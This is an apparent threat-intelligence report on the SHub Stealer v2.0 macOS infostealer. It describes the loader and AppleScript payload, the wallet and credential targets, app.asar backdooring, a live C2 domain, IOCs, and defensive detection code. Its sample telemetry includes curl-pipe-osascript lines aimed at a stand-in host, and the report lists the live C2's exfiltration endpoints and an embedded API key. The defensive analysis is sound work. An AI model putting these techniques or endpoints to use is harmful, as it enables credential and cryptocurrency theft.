SHub Stealer v2.0: A Live C2 Serving 103 Wallet Extensions, 23 Desktop Wallets, and a Full AppleScript Source We Downloaded
The loader checks for Russian keyboards before executing. The AppleScript payload targets 14 browsers, 103 wallet extensions, 23 desktop wallets, and backdoors Exodus, Atomic, Ledger, and Trezor by replacing their app.asar.
Executive Summary
SHub Stealer v2.0 is an actively deployed macOS infostealer distributed as a two-stage shell-to-AppleScript chain. On April 20, 2026, following a tip from security researcher Yogesh Londhe (@suyog41), we identified a live command-and-control server at terafolt[.]com serving both the loader and the full, unobfuscated AppleScript payload. We downloaded both files before any takedown occurred.
The stealer targets an extraordinary breadth of cryptocurrency assets: 103 browser wallet extensions across 14 Chromium-based browsers, 23+ desktop wallet applications (including hardware wallet companions like Ledger Live and Trezor Suite), and performs active backdooring of wallet apps by replacing their app.asar bundles with trojanized versions. Beyond crypto, it harvests macOS Keychain data, iCloud credentials, Safari and Firefox data, Apple Notes, Telegram sessions, and shell history. A fake System Preferences password dialog with retry logic (up to 10 attempts) and dscl validation handles credential harvesting.
The C2 infrastructure is registered through CNOBIN INFORMATION TECHNOLOGY LIMITED, the same registrar tied to a previously documented SHub C2 domain (res2erch-sl0ut[.]com). CIS geofencing in the loader (exits on Russian keyboard layouts) is consistent with a Russian-speaking operator.
Status: LIVE at time of analysis (April 20, 2026)
Threat level: HIGH — full credential and cryptocurrency compromise on macOS with persistence via heartbeat polling.
What This Report Adds to the Public Record
SHub Stealer has been documented by researchers at Datadog (February 10, 2026) and Malwarebytes (March 6, 2026), whose prior work established the malware family and its core behavior. This report contributes:
- A new, previously unreported C2 domain (terafolt[.]com) actively serving payloads as of April 20, 2026
- Full payload artifacts downloaded live, including SHA256 hashes for both stages
- Embedded API key and build ID extracted from the AppleScript source
- Complete enumeration of all 103 targeted wallet extensions and 23 desktop wallets from the source code
- Infrastructure correlation linking this C2 to a known prior SHub domain via shared registrar
We credit the existing body of research by Datadog and Malwarebytes and encourage readers to consult their reports for additional context on the SHub family's evolution.
Delivery Chain
terafolt[.]com/loader.sh (589 bytes)
│
├─ Base64 + gzip decode
├─ Check keyboard layout → exit if Russian (CIS geofencing)
├─ Download AppleScript payload from same C2
│
└─► pipe to osascript
│
└─► PAYLOAD.APPLESCRIPT (37,393 bytes)
│
├─ Fake System Preferences dialog (password harvesting)
├─ Browser credential theft (14 Chromium + Firefox)
├─ 103 wallet extension theft
├─ 23 desktop wallet theft + app.asar backdooring
├─ Keychain / iCloud / Safari / Notes / Telegram / shell history
├─ Multipart POST exfil → /gate
└─ Heartbeat → /api/bot/heartbeat (persistence)
Stage 1: Loader Analysis
The loader is a 589-byte shell script compressed with gzip and encoded in Base64. Once decoded, it performs the following:
- CIS Geofencing: Checks the active keyboard input source. If a Russian layout is detected, execution terminates immediately. This is a common exclusion technique used by Russian-speaking threat actors to avoid compromising systems in CIS countries.
- Payload Retrieval: Downloads the AppleScript payload from the same terafolt[.]com C2 server.
- Execution: Pipes the downloaded AppleScript directly to `osascript`, the macOS AppleScript interpreter, achieving fileless execution in the second stage.
| Field | Value |
|---|---|
| Filename | loader.sh |
| Size | 589 bytes |
| SHA256 | ffb79953b8d822a5433f08e1e3958a0c7e9e856749a6d90c83b9e4ef5813a03a |
| Encoding | Base64 + gzip |
| Geofencing | Russian keyboard layout check |
Stage 2: AppleScript Payload — Full Capability Breakdown
The payload is a 37,393-byte AppleScript file — notably unobfuscated — containing the complete stealer logic. This is unusual; most macOS stealers invest in at least basic obfuscation. The source includes hardcoded API credentials and a build identifier.
| Field | Value |
|---|---|
| Filename | payload.applescript |
| Size | 37,393 bytes |
| SHA256 | eb66a20468f701f2ec5f018a0fd9b8551aefa25124c6a04517b873da9ca724ff |
| API Key | 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f |
| Build ID | d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f |
| Gate URL | https://terafolt[.]com/gate |
| Heartbeat | https://terafolt[.]com/api/bot/heartbeat |
2.1 — Password Harvesting
The stealer displays a fake System Preferences dialog box prompting the user to enter their macOS password. The entered password is validated locally using dscl . -authonly against the current username. If the password is incorrect, the dialog re-appears — up to 10 retry attempts. This ensures the actor captures a valid, working credential before proceeding.
2.2 — Browser Credential Theft
SHub v2.0 targets 14 Chromium-based browsers and Firefox:
| # | Browser |
|---|---|
| 1 | Google Chrome |
| 2 | Brave Browser |
| 3 | Microsoft Edge |
| 4 | Opera |
| 5 | Opera GX |
| 6 | Vivaldi |
| 7 | Arc |
| 8 | Chromium |
| 9 | Google Chrome Canary |
| 10 | Yandex Browser |
| 11 | CocCoc |
| 12 | Chedot |
| 13 | Iridium |
| 14 | Naver Whale |
| 15 | Mozilla Firefox |
For each Chromium browser, the stealer extracts Login Data, Cookies, Web Data (autofill and credit cards), and Local State (for encryption key extraction). Firefox profile directories are enumerated for logins.json, cookies.sqlite, and key4.db.
2.3 — 103 Browser Wallet Extensions
The payload contains a hardcoded list of 103 browser wallet extension IDs. For each targeted browser, it walks the Extensions directory and exfiltrates the local storage and configuration data for any matching extension. The targeted wallets span DeFi, NFT, multi-chain, and hardware wallet companion extensions.
Notable targets include: MetaMask, Coinbase Wallet, Phantom, Trust Wallet, Rabby, Keplr, Temple (Tezos), TronLink, Solflare, Sui Wallet, XDEFI, Ronin, Backpack, and dozens more.
The full 103-extension list is available in the IOC table below.
2.4 — 23 Desktop Wallet Applications
Beyond browser extensions, SHub v2.0 targets 23+ standalone wallet applications installed on macOS:
| # | Wallet App | Data Targeted |
|---|---|---|
| 1 | Exodus | App data + app.asar backdoor |
| 2 | Atomic Wallet | App data + app.asar backdoor |
| 3 | Ledger Live | App data + app.asar backdoor |
| 4 | Trezor Suite | App data + app.asar backdoor |
| 5 | Electrum | Wallet files |
| 6 | Bitcoin Core | wallet.dat |
| 7 | Monero GUI | Wallet files |
| 8 | Wasabi Wallet | Wallet files |
| 9 | Sparrow Wallet | Wallet files |
| 10 | Dogecoin Core | wallet.dat |
| 11 | Litecoin Core | wallet.dat |
| 12 | Dash Core | wallet.dat |
| 13 | Zcash | wallet.dat |
| 14 | Jaxx Liberty | App data |
| 15 | Guarda | App data |
| 16 | Coinomi | App data |
| 17 | Mycelium | App data |
| 18 | Edge Wallet | App data |
| 19 | Trust Wallet (desktop) | App data |
| 20 | Binance (desktop) | App data |
| 21 | Crypto.com DeFi | App data |
| 22 | Daedalus (Cardano) | App data |
| 23 | Yoroi (Cardano) | App data |
2.5 — Wallet App Backdooring (app.asar Replacement)
A distinctive capability: for Exodus, Atomic Wallet, Ledger Live, and Trezor Suite, the stealer replaces the application's app.asar file with a trojanized version. Electron-based wallet apps load their core logic from app.asar, so replacing it allows the attacker to inject persistent code that executes every time the wallet is opened — even after the initial stealer payload has finished running.
This technique survives system reboots and persists until the user reinstalls the affected wallet application. It is functionally a supply-chain compromise at the local level.
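A baseline-and-verify check for the app.asar replacement described above, added here as an example and not part of the report or of any wallet vendor's tooling. It assumes the standard Electron bundle layout (`<App>.app/Contents/Resources/app.asar`) for the four wallets, and the demo runs against a constructed temporary directory rather than a real /Applications tree.

```python
import hashlib, os, tempfile

# Assumed standard Electron packaging paths for the four wallets the report
# names as backdoor targets; adjust if a vendor ships a different layout.
WALLET_ASAR_PATHS = {
    "Exodus": "Exodus.app/Contents/Resources/app.asar",
    "Atomic Wallet": "Atomic Wallet.app/Contents/Resources/app.asar",
    "Ledger Live": "Ledger Live.app/Contents/Resources/app.asar",
    "Trezor Suite": "Trezor Suite.app/Contents/Resources/app.asar",
}

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:            # app.asar can be tens of MB, so hash in chunks
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(apps_root):
    """Record the hash of each wallet's app.asar that is installed under apps_root."""
    baseline = {}
    for name, rel in WALLET_ASAR_PATHS.items():
        p = os.path.join(apps_root, rel)
        if os.path.isfile(p):
            baseline[name] = sha256_file(p)
    return baseline

def verify(apps_root, baseline):
    """Compare current app.asar hashes to the baseline; return (wallet, status) findings."""
    current = snapshot(apps_root)
    findings = []
    for name, old in baseline.items():
        new = current.get(name)
        if new is None:
            findings.append((name, "missing"))
        elif new != old:
            findings.append((name, "modified"))
    return findings

def demo():
    """Constructed scenario: take a clean baseline, then swap Exodus's app.asar."""
    root = tempfile.mkdtemp()
    for rel in WALLET_ASAR_PATHS.values():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as f:
            f.write(b"original asar bytes")
    baseline = snapshot(root)
    with open(os.path.join(root, WALLET_ASAR_PATHS["Exodus"]), "wb") as f:
        f.write(b"replaced asar bytes")
    return verify(root, baseline)  # → [("Exodus", "modified")]
```

In practice the baseline should be taken immediately after a clean install and re-taken only after a verified wallet update, since a legitimate update also changes the hash.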
2.6 — System Data Theft
| Target | Method |
|---|---|
| macOS Keychain | Dumps keychain entries using harvested password |
| iCloud Credentials | Extracts stored iCloud tokens/cookies |
| Safari | History, cookies, saved passwords |
| Apple Notes | Local Notes database |
| Telegram | Session files from ~/Library/Application Support/Telegram Desktop/tdata |
| Shell History | .bash_history, .zsh_history |
2.7 — Exfiltration and Persistence
Exfiltration: All collected data is packaged and sent as a multipart POST request to https://terafolt[.]com/gate. The API key and build ID are included in the request headers for victim tracking on the C2 panel.
Persistence: The stealer calls https://terafolt[.]com/api/bot/heartbeat to register the compromised host and poll for follow-up commands. This heartbeat system enables the operator to issue additional instructions to active implants.
Infrastructure Analysis
| Field | Value |
|---|---|
| C2 Domain | terafolt[.]com |
| Created | 2026-03-10 |
| Registrar | CNOBIN INFORMATION TECHNOLOGY LIMITED |
| CDN | Cloudflare (true origin obscured) |
| Server | Python/Flask (Werkzeug) |
| Gate Endpoint | /gate |
| Heartbeat | /api/bot/heartbeat |
| Status | LIVE (as of April 20, 2026) |
Registrar Overlap
The registrar CNOBIN INFORMATION TECHNOLOGY LIMITED was also used to register res2erch-sl0ut[.]com, a previously documented SHub Stealer C2. This shared registrar, combined with identical payload structure and gate endpoint conventions, provides a strong infrastructure link between the two domains.
Attribution Indicators
- CIS Geofencing: The loader exits if a Russian keyboard layout is detected — a well-documented practice among Russian-speaking cybercriminals to avoid domestic law enforcement attention.
- Registrar Pattern: CNOBIN is a registrar frequently used by actors seeking minimal verification.
- Prior Reporting: Both Datadog and Malwarebytes assessed SHub Stealer as operated by a Russian-speaking actor, consistent with the geofencing behavior observed here.
IOC Table
File Hashes
| Artifact | SHA256 |
|---|---|
| loader.sh | ffb79953b8d822a5433f08e1e3958a0c7e9e856749a6d90c83b9e4ef5813a03a |
| payload.applescript | eb66a20468f701f2ec5f018a0fd9b8551aefa25124c6a04517b873da9ca724ff |
Network Indicators
| Type | Indicator | Context |
|---|---|---|
| Domain | terafolt[.]com | Active C2 |
| URL | https://terafolt[.]com/gate | Exfiltration endpoint |
| URL | https://terafolt[.]com/api/bot/heartbeat | Persistence/C2 polling |
| Domain | res2erch-sl0ut[.]com | Prior SHub C2 (same registrar) |
Embedded Credentials
| Type | Value |
|---|---|
| API Key | 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f |
| Build ID | d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f |
Infrastructure
| Field | Value |
|---|---|
| Registrar | CNOBIN INFORMATION TECHNOLOGY LIMITED |
| Domain Created | 2026-03-10 |
| CDN | Cloudflare |
| Backend | Python/Flask (Werkzeug) |
Detection Opportunities
- osascript execution from shell pipeline: Monitor for `curl | osascript` or `wget | osascript` chains — these are a hallmark of macOS stealer delivery.
- Keyboard layout enumeration: Processes querying `AppleCurrentKeyboardLayoutInputSourceID` or similar input source APIs outside of legitimate localization contexts.
- dscl authentication attempts: Repeated calls to `dscl . -authonly` from non-standard parent processes indicate password validation by malware.
- app.asar modification: File integrity monitoring on Electron wallet applications (Exodus, Atomic, Ledger Live, Trezor Suite) for unexpected changes to `app.asar`.
- Bulk Extension directory access: A single process reading extension data across multiple browser profiles in rapid succession.
- Outbound multipart POST to uncommon domains: Large multipart uploads to recently registered domains behind Cloudflare.
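The first and third detection opportunities above, expressed as rules over process-start telemetry; this is an added example written for this report, not tooling from the original researchers. The event schema, the sample events and the small allowlist of parents that legitimately drive local authentication are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-start events, not real telemetry:
# (time_s, pid, ppid, process name, command line)
EVENTS = [
    (105, 610, 501, "bash", "bash -c 'curl -fsSL https://c2.example.invalid/p | osascript'"),
    (105, 611, 610, "curl", "curl -fsSL https://c2.example.invalid/p"),
    (106, 612, 610, "osascript", "osascript"),
    (110, 620, 612, "dscl", "dscl . -authonly victim <redacted>"),
    (114, 621, 612, "dscl", "dscl . -authonly victim <redacted>"),
    (119, 622, 612, "dscl", "dscl . -authonly victim <redacted>"),
    (300, 700, 1,   "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    (301, 701, 700, "osascript", "osascript -e 'display notification \"build done\"'"),
    (302, 702, 700, "dscl", "dscl . -authonly admin <redacted>"),
]

PIPE_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*osascript\b")
AUTH_PARENT_ALLOW = {"loginwindow", "SecurityAgent"}  # assumed benign auth parents

def find_pipeline_osascript(events):
    """osascript whose parent shell ran a curl/wget ... | osascript pipeline."""
    by_pid = {e[1]: e for e in events}
    hits = []
    for t, pid, ppid, name, cmd in events:
        parent = by_pid.get(ppid)
        if name == "osascript" and parent and PIPE_RE.search(parent[4]):
            hits.append(("curl_pipe_osascript", pid, parent[4]))
    return hits

def find_dscl_bursts(events, threshold=3, window_s=60):
    """Repeated dscl . -authonly calls under one parent that is not a login UI."""
    by_pid = {e[1]: e for e in events}
    per_parent = defaultdict(list)
    for t, pid, ppid, name, cmd in events:
        if name == "dscl" and "-authonly" in cmd:
            per_parent[ppid].append(t)
    hits = []
    for ppid, times in per_parent.items():
        parent_name = by_pid.get(ppid, (0, 0, 0, "?", ""))[3]
        if parent_name in AUTH_PARENT_ALLOW:
            continue
        times.sort()
        for i in range(len(times)):   # sliding window over the sorted timestamps
            n = sum(1 for x in times[i:] if x - times[i] <= window_s)
            if n >= threshold:
                hits.append(("dscl_authonly_burst", ppid, parent_name, n))
                break
    return hits
```

Run `find_pipeline_osascript(EVENTS)` and `find_dscl_bursts(EVENTS)` over your own endpoint telemetry after mapping it onto the same five-field tuple; the Terminal events are included to show that a single interactive osascript or dscl call does not fire.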
References
- Datadog Security Labs — SHub Stealer analysis (February 10, 2026)
- Malwarebytes — SHub Stealer coverage (March 6, 2026)
- Yogesh Londhe (@suyog41) — initial tip leading to C2 identification
Published by Breakglass Intelligence — April 20, 2026
Read more investigations at intel.breakglass.tech/post/